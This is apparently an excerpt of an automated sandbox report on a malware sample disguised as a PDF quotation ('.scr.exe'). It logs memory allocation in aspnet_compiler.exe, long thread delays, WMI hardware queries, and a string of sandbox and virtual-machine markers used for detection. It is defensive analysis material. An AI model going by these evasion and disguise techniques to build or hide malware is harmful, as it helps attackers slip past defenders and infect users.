Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7EAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: EXPLORERJSBIEDLL.DLLKCUCKOOMON.DLLLWIN32_PROCESS.HANDLE='{0}'MPARENTPROCESSIDNCMDOSELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILUREPVERSIONQSERIALNUMBERSVMWARE\|VIRTUAL\|A M I\|XENTSELECT * FROM WIN32_COMPUTERSYSTEMUMANUFACTURERVMODELWMICROSOFT\|VMWARE\|VIRTUALXJOHNYANNAZXXXXXXXX

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Memory allocated: 210A7AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Memory allocated: 210BFCE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 1E56C530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 1E56DF60000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597030	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Window / User API: threadDelayed 7526	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Window / User API: threadDelayed 2293	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 1311	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 8542	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7744	Thread sleep count: 7526 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7744	Thread sleep count: 2293 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -99874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -99544s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -99429s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -99314s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -99154s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -99045s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -98933s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -98812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -98703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -98593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -98459s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -98328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -98218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -98109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -97999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -97876s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -97734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -97624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -97512s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -97406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -97296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -97186s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -97077s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -96968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -96859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -96749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -96640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -96531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -96413s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -96296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -96149s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -96031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -95859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -95749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -95640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -95531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -95421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -95312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -95202s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -95093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -94984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -94874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -94765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -94656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -94546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7708	Thread sleep time: -94437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep count: 1311 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep count: 8542 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -597030s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -595718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -595171s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5960	Thread sleep time: -594625s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 99874	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 99544	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 99429	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 99314	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 99154	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 99045	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 98933	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 98812	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 98703	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 98593	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 98459	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 98328	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 98218	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 98109	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 97999	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 97876	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 97734	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 97624	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 97512	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 97406	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 97296	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 97186	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 97077	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 96968	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 96859	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 96749	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 96640	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 96531	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 96413	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 96296	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 96149	Jump to behavior
